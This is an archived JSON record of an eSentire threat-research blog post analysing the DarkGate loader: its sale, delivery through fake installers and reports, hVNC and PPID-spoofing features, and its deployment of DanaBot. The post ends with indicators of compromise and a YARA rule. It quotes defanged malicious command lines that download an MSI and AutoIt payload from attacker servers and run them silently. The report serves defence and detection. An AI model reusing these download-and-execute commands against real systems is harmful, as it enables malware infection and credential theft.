{
	"id": "ed7ee245-378c-4732-a366-b0b95cc77217",
	"created_at": "2026-04-06T01:30:36.04376Z",
	"updated_at": "2026-04-10T13:12:20.391915Z",
	"deleted_at": null,
	"sha1_hash": "3249b4b93f13c161faf840479d429fd730b09512",
	"title": "From DarkGate to DanaBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7423323,
	"plain_text": "From DarkGate to DanaBot\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-06 00:51:21 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nSince August 2023, the eSentire Threat Response Unit (TRU) has observed two cases of DarkGate infection\r\ntargeting the Finance and Manufacturing industries. The stealer was delivered via drive-by downloads disguised as\r\nfake installers, such as Advanced IP Scanner, as well as fake document reports.\r\nDarkGate, a loader written in Borland Delphi, was first announced for sale on a Russian-speaking hacking forum\r\nin early June 2023. The loader developer claimed to have been working on the project since 2017. DarkGate has\r\nan extensive list of features, including hVNC, hAnyDesk, credential stealing, crypto mining, rootkit, reverse\r\nproxy, keylogger, remote desktop, etc. 
The loader is priced at $1,000 for one day of use and $15,000 for monthly\r\nusage.\r\nFor initial access, the loader is delivered as LNK, VBS, or MSI files, which lead to the execution of the\r\nAutoIt script.\r\nhttps://www.esentire.com/blog/from-darkgate-to-danabot\r\nPage 1 of 15\n\nFigure 1: Loader advertisement on exploit[.]in\r\nThe developer of DarkGate has announced a CrackMe challenge on the forum, offering a reward of $30,000 to\r\nanyone who can bypass the licensing system of the loader's builder/panel.\r\nFigure 2: CrackMe challenge announcement\r\nThe DarkGate loader has grown significantly in popularity, with the developer stating it reached 30 users per\r\nmonth. However, the developer is no longer issuing licenses to new users.\r\nFigure 3: Announcement to stop providing new licenses\r\nRastaFarEye, the mastermind behind DarkGate, is reputed to be a seasoned malware developer, according to users\r\non hacking forums. He is also believed to be the creator of the stealer identified by Kaspersky as\r\n“GreetingGhoul”.\r\nFigure 4: GreetingGhoul sale announcement on a hacking forum\r\nDelivery and Technical Analysis\r\nThe initial access occurred via a drive-by download. 
The user was searching for unclaimed money and navigated\r\nto the malicious site via Google Ads and downloaded an automatically generated fake report as a ZIP archive that\r\ncontained the malicious VBS script.\r\nFigure 5: Infection chain within the managed EDR (CrowdStrike)\r\nFigure 6: Malicious website serving the payload\r\nWe found three additional websites potentially serving the payloads:\r\nfreelookup[.]org\r\ntreasurydept[.]org\r\ncapitalfinders[.]org\r\nInterestingly enough, DanaBot used the same payload delivery technique reported by a threat researcher at\r\nProofpoint.\r\nFigure 7: Twitter thread on the same delivery technique used by DanaBot\r\nThe VBS script leads to the execution of the following command:\r\n\"/c cd /d C:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\ \u0026 copy c:\\windows\\system32\\curl[.]exe\r\nHnVMJmSBX[.]exe \u0026 HnVMJmSBX[.]exe -o aDRQdO[.]msi hxxps[://]plano[.]soulcarelife[.]org/?\r\n5nzumurxizhrb3bpztdybha98e8 \u0026 C:\\Windows\\System32\\msiexec[.]exe /i aDRQdO[.]msi /qn\"\r\nThe script retrieves the MSI installer from one of the attacker-controlled servers. 
\r\nFigure 8: Malicious VBS script delivering DarkGate MSI installer\r\nThe execution of the MSI installer eventually leads to the following command execution:\r\n\"C:\\Windows\\System32\\cmd[.]exe\" /c mkdir c:\\bclr \u0026 cd /d c:\\bclr \u0026 copy c:\\windows\\system32\\curl.exe\r\nbclr.exe \u0026 bclr -H \"User-Agent: curl\" -o Autoit3.exe hxxp[://]whatup[.]cloud:9999 \u0026 bclr -o kdvyeg.au3\r\nhxxp[://]whatup[.]cloud:9999/msibclrlapx \u0026 Autoit3.exe kdvyeg.au3\r\nThe command creates the bclr directory under C:\\, copies curl.exe from C:\\Windows\\system32 into the bclr\r\ndirectory as bclr.exe, and downloads kdvyeg.au3 (MD5: 296c88dda6b9864da68f0918a6a7280d) (the DarkGate\r\nAutoIt script) and Autoit3.exe.\r\nThreat Analyst @0xToxin already performed a great analysis of the AutoIt script that can be accessed here.\r\nUpon initial infection, DarkGate achieves persistence on the host via the Startup folder to run the malicious AutoIt\r\nscript dropped under the ProgramData folder as shown below. The shortcut file is removed by the injected process\r\nand recreated periodically, which makes it hard for an analyst to identify the persistence mechanism.\r\nFigure 9: Contents of the shortcut file\r\nIn the case we were investigating, the loader opens the decoy PDF file shown below.\r\nFigure 10: Decoy PDF file\r\nCompared to the previous version of DarkGate where the final DarkGate payload would be decrypted via an XOR\r\nroutine, the latest DarkGate version utilizes a custom base64-encoding algorithm, as shown below.\r\nFigure 11: Custom base64-decoding function\r\nIn the previous version, when decrypting the final payload, it contained a configuration with a custom base64-\r\nencoded string. 
In the newer version, the configuration and the C2 domains are separated into two distinct parts.\r\nThe configuration part is ZLIB-compressed and custom base64-encoded.\r\nFigure 12: Extracted configuration\r\nAs mentioned above, DarkGate has the hVNC capability. From the snippet shown below, the hVNC is broken into\r\ndifferent phases including a Cleaning Virtual Desk Processes Phase involving thread termination, a Browser Handling\r\nPhase (possibly handling certain browser attributes or configurations), and an Optimization Phase where certain\r\nbrowser settings are disabled for better performance, such as disabling audio, the sandboxing feature, and GPU\r\nhardware acceleration.\r\nFigure 13: hVNC functionality\r\nDarkGate performs process hollowing for the core and additional payloads into one of the following processes:\r\nGoogleUpdate.exe\r\nTabTip32.exe\r\nBraveUpdate.exe\r\nMicrosoftEdgeUpdate.exe\r\nielowutil.exe\r\nIf process hollowing fails for the above processes, DarkGate proceeds with injecting into cmd.exe, which\r\nsubsequently spawns notepad.exe. We have observed DarkGate injecting DanaBot into notepad.exe. Additionally,\r\nthe UAC bypass module was also used for injection. Upon terminating the injected process, DarkGate implements\r\nPPID spoofing (Parent Process ID Spoofing).\r\nPPID spoofing involves manipulating the parent process ID attribute of a newly created process. 
This is done to\r\ndeceive security solutions into believing the new process was created by a legitimate parent process.\r\nIf there is an attempt to terminate this malicious process, it has the capability to reinitialize itself under\r\nanother spoofed parent process, continuing its malicious activities while staying under the radar.\r\nFigure 14: The function responsible for PPID spoofing\r\nIn the code snippet provided, the DarkGate malware attempts to open the desired process and spoof it, repeating\r\nthe attempt up to 12 times until successful. This process involves initializing and updating a thread attribute list. If\r\nsuccessful, the execution flow progresses to a function where it allocates memory within the targeted process,\r\nwrites malicious code into that memory space, and initiates a new thread within the target process to execute the\r\ninjected code.\r\nIf the spoofing attempts fail after 12 tries, it exits with an error, specifically indicating an\r\n“InjectCustomShellcodeWithParamsAndSpoff failure”.\r\nWe can confirm whether the loader is using the PPID spoofing technique by running the Despoof tool, a process-spoofing\r\ndetector written by our Principal Security Researcher, Jacob Gajek.\r\nFigure 15: Running Despoof tool to detect PPID spoofing\r\nDarkGate has the ability to manipulate browser data, delete shadow copies (provided the user has administrative\r\nrights), and initiate a shutdown of the infected host.\r\nFigure 16: Additional DarkGate functionalities including system shutdown and browser folder\r\nmanipulations\r\nIt’s also worth mentioning that, compared to previous versions of DarkGate, where the strings were stored as\r\ncustom base64-encoded strings, the new version passes the encoded strings as byte arrays instead, which breaks the\r\nexisting scripts that decode the custom 
base64-encoded strings.\r\nFigure 17: Encoded strings passed as byte arrays\r\nWhat did we do?\r\nOur team of 24/7 SOC Cyber Analysts isolated the affected host to contain the infection.\r\nOur team provided remediation recommendations and support to the customer.\r\nWhat can you learn from this TRU Positive?\r\nThe DarkGate loader is rapidly becoming favored amongst threat actors owing to its stealth features and\r\nextensive array of capabilities.\r\nThe loader is using PPID spoofing to evade detections.\r\nIn the infection chain we observed, DanaBot appears to be deployed by the DarkGate loader.\r\nRecommendations from our Threat Response Unit (TRU) Team:\r\nProtecting against information stealers requires a multi-layered defense approach to defend endpoints from\r\nmalware and detect or block unauthorized login activity against applications and remote access services.\r\nTherefore, we recommend:\r\nProtecting endpoints against malware.\r\nEnsure antivirus signatures are up to date.\r\nUse a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) product to detect and contain\r\nthreats.\r\nIf information-stealing malware is identified, reset the user’s credentials and terminate logon sessions\r\nimmediately.\r\nEncouraging good cybersecurity hygiene among your users by using Phishing and Security Awareness\r\nTraining (PSAT) when downloading software from the Internet.\r\nRestricting access to enterprise applications from personal devices outside the scope of security\r\nmonitoring.\r\nEnsuring adequate logging is in place for remote access services such as VPNs and using modern\r\nauthentication methods, which support MFA and conditional access.\r\nPrevent web browsers from automatically saving and storing passwords.\r\nUse of reputable password managers is recommended instead.\r\nIndicators of Compromise\r\nName Indicators\r\nWebsite serving DarkGate payload 
assetfinder[.]org\r\nkdvyeg.au3 296c88dda6b9864da68f0918a6a7280d\r\nDecrypted DarkGate payload 786486d57e52d2c59f99f841989bfc9d\r\nDarkGate C2 whatup[.]cloud\r\nDarkGate C2 dreamteamup[.]shop\r\nDanaBot 137215315ebf1a920f6ca96be486e358\r\nDanaBot C2 34.106.84.60:443\r\nDanaBot C2 35.241.250.23:443\r\nDanaBot C2 35.198.55.140:443\r\nDanaBot C2 34.79.119.253:443\r\nDanaBot embedded hash 32283E415C433DE356C9557DF0309441\r\nIrsForm1340.pdf (decoy file) d8b39e8d78386294e139286f27568dd6\r\nYara\r\nrule DarkGate {\r\n meta:\r\n author = \"RussianPanda\"\r\n description = \"Detects DarkGate\"\r\n date = \"9/17/2023\"\r\n strings:\r\n $s1 = \"hanydesk\"\r\n $s2 = \"darkgate.com\"\r\n $s3 = \"zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=\"\r\n $s4 = {80 e3 30 81 e3 ff 00 00 00 c1 eb 04}\r\n $s5 = {80 e3 3c 81 e3 ff 00 00 00 c1 eb 02}\r\n $s6 = {80 e1 03 c1 e1 06}\r\n condition:\r\n all of ($s*)\r\n and uint16(0) == 0x5A4D\r\n }\r\nReference\r\nhttps://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/\r\nhttps://twitter.com/ffforward/status/1461417886526984195?s=20\r\nhttps://0xtoxin.github.io/threat breakdown/DarkGate-Camapign-Analysis/\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. 
TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/from-darkgate-to-danabot\r\n",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.esentire.com/blog/from-darkgate-to-danabot"
	],
	"report_names": [
		"from-darkgate-to-danabot"
	],
	"threat_actors": [],
	"ts_created_at": 1775439036,
	"ts_updated_at": 1775826740,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3249b4b93f13c161faf840479d429fd730b09512.pdf",
		"text": "https://archive.orkl.eu/3249b4b93f13c161faf840479d429fd730b09512.txt",
		"img": "https://archive.orkl.eu/3249b4b93f13c161faf840479d429fd730b09512.jpg"
	}
}